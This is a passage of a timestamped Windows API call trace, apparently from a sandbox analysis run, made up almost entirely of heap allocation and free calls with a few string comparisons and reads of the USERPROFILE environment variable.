| out: lpMsg=0x8bf970) returned 0 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0254.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0254.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0254.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0254.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E3PCt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3PCt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PCt.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0254.884] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ct.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0254.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0254.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0254.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0254.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0254.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0254.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0254.885] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0254.885] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0254.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0254.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0254.886] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0254.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.886] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0254.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0254.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0254.888] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.888] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.888] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0254.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0254.889] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0254.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0254.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0254.889] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0254.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.889] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0254.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0254.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0254.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0254.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0254.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0254.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0254.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0254.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0254.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0254.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0254.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0254.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0254.892] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0254.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0254.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.892] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0254.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0254.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0254.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0254.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0254.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.893] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.893] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0254.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0254.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0254.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0254.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0254.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0254.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0254.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.894] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0254.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0254.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 